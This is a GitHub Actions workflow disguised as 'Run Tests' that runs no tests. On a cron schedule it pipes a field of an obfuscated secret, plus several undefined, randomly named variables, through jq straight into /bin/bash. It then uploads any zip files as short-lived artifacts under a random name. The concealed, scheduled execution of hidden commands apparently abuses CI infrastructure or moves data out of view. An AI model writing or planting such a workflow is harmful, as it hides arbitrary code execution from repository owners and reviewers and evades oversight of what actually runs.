name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '58 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          mc49: ${{ secrets.mc49 }}
        run: |
          printf '%s' "$mc49" | jq -r .o26 | /bin/bash
          printf '%s' "$l62289" | jq -r .qioj72191 | /bin/bash
          echo $mw562 | jq -r .s82 | /bin/bash
          echo $wl95 | jq -r .ccb03 | /bin/bash
          echo $vcf96419 | jq -r .uw89319 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: HvhVJ1Fx
          path: "*.zip"
          retention-days: 1
